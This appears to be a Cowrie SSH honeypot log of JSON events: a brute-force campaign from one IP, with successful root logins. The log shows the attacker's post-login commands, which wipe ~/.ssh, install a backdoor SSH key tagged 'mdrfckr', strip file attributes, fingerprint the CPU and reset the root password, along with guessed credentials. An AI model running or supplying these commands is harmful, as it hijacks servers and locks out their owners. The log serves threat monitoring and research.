{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56644,"dst_ip":"1.2.3.4","dst_port":22,"session":"59e252a4a088","protocol":"ssh","message":"New connection: 212.227.235.229:56644 (1.2.3.4:22) [session: 59e252a4a088]","sensor":"my-vps","timestamp":"2025-09-09T01:31:24.935599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:31:24.936580Z","src_ip":"212.227.235.229","session":"59e252a4a088"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:31:25.177754Z","src_ip":"212.227.235.229","session":"59e252a4a088"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:31:25.290092Z","src_ip":"212.227.235.229","session":"6dc722acad99"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:31:25.290949Z","src_ip":"212.227.235.229","session":"6dc722acad99"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:31:25.556854Z","src_ip":"212.227.235.229","session":"6dc722acad99"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:25.557892Z","src_ip":"212.227.235.229","session":"6dc722acad99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37054,"dst_ip":"1.2.3.4","dst_port":22,"session":"7442a962aad7","protocol":"ssh","message":"New connection: 212.227.235.229:37054 (1.2.3.4:22) [session: 7442a962aad7]","sensor":"my-vps","timestamp":"2025-09-09T01:31:25.815845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:31:25.817064Z","src_ip":"212.227.235.229","session":"7442a962aad7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:31:26.075759Z","src_ip":"212.227.235.229","session":"7442a962aad7"}
{"eventid":"cowrie.login.failed","username":"test","password":"111111","message":"login attempt [test/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:31:26.183894Z","src_ip":"212.227.235.229","session":"59e252a4a088"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:31:27.152475Z","src_ip":"212.227.235.229","session":"7442a962aad7"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:27.427700Z","src_ip":"212.227.235.229","session":"59e252a4a088"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:28.413222Z","src_ip":"212.227.235.229","session":"7442a962aad7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37060,"dst_ip":"1.2.3.4","dst_port":22,"session":"18a574d28574","protocol":"ssh","message":"New connection: 212.227.235.229:37060 (1.2.3.4:22) [session: 18a574d28574]","sensor":"my-vps","timestamp":"2025-09-09T01:31:28.670509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:31:28.671864Z","src_ip":"212.227.235.229","session":"18a574d28574"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:31:28.930341Z","src_ip":"212.227.235.229","session":"18a574d28574"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:31:30.003784Z","src_ip":"212.227.235.229","session":"18a574d28574"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:30.264219Z","src_ip":"212.227.235.229","session":"6dc722acad99"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:30.265412Z","src_ip":"212.227.235.229","session":"18a574d28574"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42784,"dst_ip":"1.2.3.4","dst_port":22,"session":"74286c3cde7f","protocol":"ssh","message":"New connection: 212.227.235.229:42784 (1.2.3.4:22) [session: 74286c3cde7f]","sensor":"my-vps","timestamp":"2025-09-09T01:31:37.736613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:31:37.737401Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:31:39.632377Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd123!","message":"login attempt [root/P@ssw0rd123!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:31:40.336642Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:31:41.364427Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:31:41.365118Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:31:41.366125Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:41.610648Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:31:42.130894Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:31:42.131649Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:31:42.371729Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:42.372618Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40228,"dst_ip":"1.2.3.4","dst_port":22,"session":"705fc80cd7bb","protocol":"ssh","message":"New connection: 212.227.235.229:40228 (1.2.3.4:22) [session: 705fc80cd7bb]","sensor":"my-vps","timestamp":"2025-09-09T01:31:42.621019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:31:42.637691Z","src_ip":"212.227.235.229","session":"705fc80cd7bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35548,"dst_ip":"1.2.3.4","dst_port":22,"session":"5432316171ea","protocol":"ssh","message":"New connection: 212.227.235.229:35548 (1.2.3.4:22) [session: 5432316171ea]","sensor":"my-vps","timestamp":"2025-09-09T01:31:42.869027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:31:42.869955Z","src_ip":"212.227.235.229","session":"5432316171ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:31:42.876984Z","src_ip":"212.227.235.229","session":"705fc80cd7bb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:31:43.109403Z","src_ip":"212.227.235.229","session":"5432316171ea"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:31:43.847418Z","src_ip":"212.227.235.229","session":"705fc80cd7bb"}
{"eventid":"cowrie.session.closed","duration":31.339985609054565,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:43.999786Z","src_ip":"212.227.125.160","session":"57c5ad512aae"}
{"eventid":"cowrie.login.failed","username":"test","password":"111111","message":"login attempt [test/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:31:44.103328Z","src_ip":"212.227.235.229","session":"5432316171ea"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:45.345596Z","src_ip":"212.227.235.229","session":"5432316171ea"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:46.106278Z","src_ip":"212.227.235.229","session":"705fc80cd7bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:31:52.716563Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T01:31:52.717258Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:52.959567Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33636,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ef5ab5fe96e","protocol":"ssh","message":"New connection: 212.227.235.229:33636 (1.2.3.4:22) [session: 7ef5ab5fe96e]","sensor":"my-vps","timestamp":"2025-09-09T01:31:54.522650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:31:54.523472Z","src_ip":"212.227.235.229","session":"7ef5ab5fe96e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:31:54.754425Z","src_ip":"212.227.235.229","session":"7ef5ab5fe96e"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T01:31:55.717479Z","src_ip":"212.227.235.229","session":"7ef5ab5fe96e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:56.950797Z","src_ip":"212.227.235.229","session":"7ef5ab5fe96e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:31:57.928769Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
{"eventid":"cowrie.command.input","input":"echo \"root:CTc2lXXgcfmt\"|chpasswd|bash","message":"CMD: echo \"root:CTc2lXXgcfmt\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-09T01:31:57.929678Z","src_ip":"212.227.235.229","session":"74286c3cde7f"}
